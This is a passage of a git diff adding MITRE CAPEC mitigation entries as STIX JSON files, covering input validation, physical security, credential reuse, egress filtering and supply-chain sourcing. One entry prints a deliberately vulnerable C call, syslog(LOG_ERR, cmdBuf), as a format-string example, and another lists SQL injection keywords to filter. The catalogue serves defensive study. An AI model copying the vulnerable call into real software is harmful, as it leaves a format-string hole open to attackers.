"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Application designers can construct a 'code book' for error messages. When using a code book, application error messages aren't generated in string or stack trace form, but are cataloged and replaced with a unique (often integer-based) value 'coding' for the error. Such a technique will require helpdesk and hosting personnel to use a 'code book' or similar mapping to decode application errors/logs in order to respond to them normally.", + "id": "course-of-action--031e02fe-84e7-4908-b507-e836876da1ab", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-54-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03927772-a50c-42a3-b4ff-f72892917b5e.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03927772-a50c-42a3-b4ff-f72892917b5e.json new file mode 100644 index 0000000000000000000000000000000000000000..a896a4cb5c760db007736b29ee0ff5606d04bfbe --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03927772-a50c-42a3-b4ff-f72892917b5e.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--2bc1110c-1df5-46a0-9863-127a91c44be6", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement", + "id": "course-of-action--03927772-a50c-42a3-b4ff-f72892917b5e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-139-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03a878aa-814d-4ec7-8981-4019491f098a.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03a878aa-814d-4ec7-8981-4019491f098a.json new file mode 100644 index 0000000000000000000000000000000000000000..b419f49597722002009ce3e81231a5c94887b866 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03a878aa-814d-4ec7-8981-4019491f098a.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--cddb353e-2b39-420b-894a-7e2c00bc8aad", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Utilize digital signatures to increase authentication assurance.", + "id": "course-of-action--03a878aa-814d-4ec7-8981-4019491f098a", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-22-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03c24d78-8f14-4663-b2ab-fdbbdac190bb.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03c24d78-8f14-4663-b2ab-fdbbdac190bb.json new file mode 100644 index 0000000000000000000000000000000000000000..0f54edfd1e22527264a29803ad3a25ed96e108ae --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03c24d78-8f14-4663-b2ab-fdbbdac190bb.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--e30a41ea-3ed1-4319-95a9-4f6b81cf752d", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong physical security of the device.", + "id": "course-of-action--03c24d78-8f14-4663-b2ab-fdbbdac190bb", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-626-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03efb1bc-0846-4331-97bb-9065c35103aa.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03efb1bc-0846-4331-97bb-9065c35103aa.json new file mode 100644 index 0000000000000000000000000000000000000000..39770fd89ac144995003f0e750067e01ce2208ff --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03efb1bc-0846-4331-97bb-9065c35103aa.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--f64c64c5-81e1-4f60-b223-afc636093389", + "objects": [ + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not reuse Kerberos service account credentials across systems.", + "id": "course-of-action--03efb1bc-0846-4331-97bb-9065c35103aa", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-652-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03fdd3ce-a674-49a6-9d85-fc475ab59474.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03fdd3ce-a674-49a6-9d85-fc475ab59474.json new file mode 100644 index 0000000000000000000000000000000000000000..3189cf19f5de2e3a9b14fc47115cb38fc7efadfe --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--03fdd3ce-a674-49a6-9d85-fc475ab59474.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--ffea77f9-92ac-457d-9ada-6125b0443cf0", + "objects": [ + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly restrict the location of the software being used.", + "id": "course-of-action--03fdd3ce-a674-49a6-9d85-fc475ab59474", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191.json new file mode 100644 index 0000000000000000000000000000000000000000..2fb223ff4995f85e3d729b51fd6a50712fcb50bd --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--9d7803a5-4d1b-4e85-bd61-a34d763b3a04", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Utilize strict type, character, and encoding enforcement", + "id": "course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-199-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--040e99bd-3494-432d-a072-6400fc8f9043.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--040e99bd-3494-432d-a072-6400fc8f9043.json new file mode 100644 index 0000000000000000000000000000000000000000..b3c0761e4fe28509bb1668c40160291cc32e787d --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--040e99bd-3494-432d-a072-6400fc8f9043.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--f5e5452c-dd68-4933-a94f-d71377dcba47", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Do not rely on client validation or encoding for security purposes.", + "id": "course-of-action--040e99bd-3494-432d-a072-6400fc8f9043", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-22-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--04c38e27-092f-44b9-9474-b6a1b89f003e.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--04c38e27-092f-44b9-9474-b6a1b89f003e.json new file mode 100644 index 0000000000000000000000000000000000000000..145d3c36fda0ac67a1ff74aac18edb19a175340e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--04c38e27-092f-44b9-9474-b6a1b89f003e.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--2f2de113-77fa-4290-8ed6-0b3bc10c3715", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Password protect documents and make them read-only for unauthorized users.", + "id": "course-of-action--04c38e27-092f-44b9-9474-b6a1b89f003e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-517-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--055aeafd-14d3-41fd-8647-156f498a27e7.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--055aeafd-14d3-41fd-8647-156f498a27e7.json new file mode 100644 index 0000000000000000000000000000000000000000..093a1c325bdac77afe8ced6ae056bbb59c4dbe9f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--055aeafd-14d3-41fd-8647-156f498a27e7.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--a8cab130-ab46-4281-8447-6235e77314af", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Acquire hardware and hardware components from trusted vendors. Additionally, determine where vendors purchase components or if any components are created/acquired via subcontractors to determine where supply chain risks may exist.", + "id": "course-of-action--055aeafd-14d3-41fd-8647-156f498a27e7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-516-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.8" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--05c9f402-bd10-4aba-84d1-3b6a25897c23.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--05c9f402-bd10-4aba-84d1-3b6a25897c23.json new file mode 100644 index 0000000000000000000000000000000000000000..4a5ec8438db1361dbe2a5e41da3fa3f6d196e817 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--05c9f402-bd10-4aba-84d1-3b6a25897c23.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--a7435ccd-6e8b-4be7-b58e-a29239e2d038", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Because Symlink can be modified by an attacker, make sure that the ones you read are located in protected directories.", + "id": "course-of-action--05c9f402-bd10-4aba-84d1-3b6a25897c23", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-45-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.6" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--05cfe44e-6dc1-45e1-9005-1ae68cd3305e.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--05cfe44e-6dc1-45e1-9005-1ae68cd3305e.json new file mode 100644 index 0000000000000000000000000000000000000000..7b078cc204eeb9618c6a5ae9d649eead4ecbb8c3 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--05cfe44e-6dc1-45e1-9005-1ae68cd3305e.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--36e06ba2-c055-4251-8699-46ed75c75ef9", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configure your firewall to block egress ICMP messages.", + "id": "course-of-action--05cfe44e-6dc1-45e1-9005-1ae68cd3305e", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-298-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--06350ba3-c63f-43d3-85a9-3d4be370deba.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--06350ba3-c63f-43d3-85a9-3d4be370deba.json new file mode 100644 index 0000000000000000000000000000000000000000..6b339ec00d4a6d774f3793b1161fd4c91e1c944c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--06350ba3-c63f-43d3-85a9-3d4be370deba.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--8ab23eb4-0fec-4acd-9027-8a29ba6923dc", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Mail servers that perform strict validation may catch these attacks, because metacharacters are not allowed in many header variables such as dns names", + "id": "course-of-action--06350ba3-c63f-43d3-85a9-3d4be370deba", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-41-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--06843957-473e-41d3-a2c0-0546525f4c5a.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--06843957-473e-41d3-a2c0-0546525f4c5a.json new file mode 100644 index 0000000000000000000000000000000000000000..16f99d8dbe5728a53f33b385afe770d67325de47 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--06843957-473e-41d3-a2c0-0546525f4c5a.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--388f18b1-0d91-4ae7-910c-a51c2dc71983", + "objects": [ + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Change the default configuration for network devices to harden their security profiles. Default configurations are often enabled with insecure features to allow ease of installation and management. However, these configurations can be easily discovered and exploited by adversaries.", + "id": "course-of-action--06843957-473e-41d3-a2c0-0546525f4c5a", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-700-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--06e89ede-e243-47b4-9f02-1fd206dd5a5b.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--06e89ede-e243-47b4-9f02-1fd206dd5a5b.json new file mode 100644 index 0000000000000000000000000000000000000000..72f369bb455d233277dca0f1c070f10600b9dab3 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--06e89ede-e243-47b4-9f02-1fd206dd5a5b.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--9d07b0a3-8719-4975-9611-6c0f0b80b406", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Changes to registry entries in \"HKLM\\Software\\Microsoft\\Windows NT\\Winlogon\\Notify\" that do not correlate with known software, patch cycles, etc are suspicious. New DLLs written to System32 which do not correlate with known good software or patching may be suspicious.", + "id": "course-of-action--06e89ede-e243-47b4-9f02-1fd206dd5a5b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-579-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--06f852ad-2811-4cac-baf2-886e7bec9bb9.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--06f852ad-2811-4cac-baf2-886e7bec9bb9.json new file mode 100644 index 0000000000000000000000000000000000000000..d146070a6290bf258e68bf1b9e54588e93443c2c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--06f852ad-2811-4cac-baf2-886e7bec9bb9.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--2ae6bc88-77fb-42b1-b4b4-65264ca3c037", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Acquire hardware and hardware components from trusted vendors. Additionally, determine where vendors purchase components or if any components are created/acquired via subcontractors to determine where supply chain risks may exist.", + "id": "course-of-action--06f852ad-2811-4cac-baf2-886e7bec9bb9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-516-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0702663e-005e-40fa-90d8-44404b86fd2c.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0702663e-005e-40fa-90d8-44404b86fd2c.json new file mode 100644 index 0000000000000000000000000000000000000000..ea6857d7c8ddecfd0a86c55677fe7c5349dc499b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0702663e-005e-40fa-90d8-44404b86fd2c.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--fe4b8c05-1e3f-41d5-8f68-5432f9fbc6ff", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n The code should be reviewed for misuse of the Syslog function call. Manual or automated code review can be used. The reviewer needs to ensure that all format string functions are passed a static string which cannot be controlled by the user and that the proper number of arguments are always sent to that function as well. If at all possible, do not use the %n operator in format strings. The following code shows a correct usage of Syslog():\n syslog(LOG_ERR, \"%s\", cmdBuf);\n The following code shows a vulnerable usage of Syslog():\n syslog(LOG_ERR, cmdBuf);\n // the buffer cmdBuff is taking user supplied data.\n \n \n ", + "id": "course-of-action--0702663e-005e-40fa-90d8-44404b86fd2c", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-67-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.7" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--076b471c-60c6-41a5-9266-e34cc546bfcd.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--076b471c-60c6-41a5-9266-e34cc546bfcd.json new file mode 100644 index 0000000000000000000000000000000000000000..1345f03674a19bf6b1a3443107ec4e8639fb2727 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--076b471c-60c6-41a5-9266-e34cc546bfcd.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--09124e33-8604-4fff-b352-cee4aa66867c", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong physical security of all devices that contain secret key information. (even when devices are not in use)", + "id": "course-of-action--076b471c-60c6-41a5-9266-e34cc546bfcd", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-622-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--07cbed26-8c96-41e6-a239-7be587a38673.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--07cbed26-8c96-41e6-a239-7be587a38673.json new file mode 100644 index 0000000000000000000000000000000000000000..4d930b1145165f170b47c19fe641a112c0dab86e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--07cbed26-8c96-41e6-a239-7be587a38673.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--7034e67c-9ea4-46f8-b8cb-18dc2f66e2b6", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as SQL content. Keywords such as UNION, SELECT or INSERT must be filtered in addition to characters such as a single-quote(') or SQL-comments (--) based on the context in which they appear.", + "id": "course-of-action--07cbed26-8c96-41e6-a239-7be587a38673", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-66-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--07eaafc8-1ee9-4824-bb3e-ca53db5435ab.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--07eaafc8-1ee9-4824-bb3e-ca53db5435ab.json new file mode 100644 index 0000000000000000000000000000000000000000..92e253432dd4a01d522317ff5c608fe6f077eda3 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--07eaafc8-1ee9-4824-bb3e-ca53db5435ab.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--82bc6cdf-fd17-4166-a81d-2f2f96a9313a", + "objects": [ + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor processes and command-line arguments for unknown behavior related to code injection.", + "id": "course-of-action--07eaafc8-1ee9-4824-bb3e-ca53db5435ab", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-640-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0878f5f1-911e-488a-8d4e-1f242b96933f.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0878f5f1-911e-488a-8d4e-1f242b96933f.json new file mode 100644 index 0000000000000000000000000000000000000000..a1f277ec1b3fa3298ab91a1388aa143b477c9970 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0878f5f1-911e-488a-8d4e-1f242b96933f.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--b537cc66-3b03-4e92-bd8f-708e0ebb3e0c", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Enforce strict schema validation. The schema should enforce a maximum number of array elements. If the number of maximum array elements can't be limited another validation method should be used. One such method could be comparing the declared number of items in the array with the existing number of elements of the array. If these numbers don't match drop the SOAP packet at the web service layer.", + "id": "course-of-action--0878f5f1-911e-488a-8d4e-1f242b96933f", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-493-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0881c782-318a-41ef-afff-13b773bc5926.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0881c782-318a-41ef-afff-13b773bc5926.json new file mode 100644 index 0000000000000000000000000000000000000000..193eb7c863efee1efa22907fc59ecf79c871db2c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--0881c782-318a-41ef-afff-13b773bc5926.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--a375fa9c-5552-499e-a556-64fc1df539ec", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Maintain strong physical system access controls and monitor networks and physical facilities for insider threats.", + "id": "course-of-action--0881c782-318a-41ef-afff-13b773bc5926", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-524-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.7" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--08a65d0b-e628-4d0b-8c91-ee3b1e9c215c.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--08a65d0b-e628-4d0b-8c91-ee3b1e9c215c.json new file mode 100644 index 0000000000000000000000000000000000000000..c51636ed20273c017d8d813d3c6d7e5b95670f6c --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--08a65d0b-e628-4d0b-8c91-ee3b1e9c215c.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--187421f2-e707-4da2-bd85-3c2ef6b7e0dd", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Disallow the inclusion of DTDs as part of incoming messages.", + "id": "course-of-action--08a65d0b-e628-4d0b-8c91-ee3b1e9c215c", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-228-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--08ac7af4-322c-41fa-bd6a-8521838eb0fc.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--08ac7af4-322c-41fa-bd6a-8521838eb0fc.json new file mode 100644 index 0000000000000000000000000000000000000000..24d3a5735f5293ae49b74e724603678ccb28c289 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--08ac7af4-322c-41fa-bd6a-8521838eb0fc.json @@ -0,0 +1,20 @@ +{ + "id": "bundle--4d105224-5468-4d77-a89b-9997ee8aed97", + "objects": [ + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only download open-source packages from reputable package managers.", + "id": "course-of-action--08ac7af4-322c-41fa-bd6a-8521838eb0fc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-693-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--08e36a84-cc88-49b9-81f6-7dab06d12023.json b/cti-ATT-CK-v13.1/capec/2.0/course-of-action/course-of-action--08e36a84-cc88-49b9-81f6-7dab06d12023.json new file mode 100644 index 0000000000000000000000000000000000000000..879b5817d0f14a43a6b8f91c326dec2512d58cf7 --- /dev/null +++ 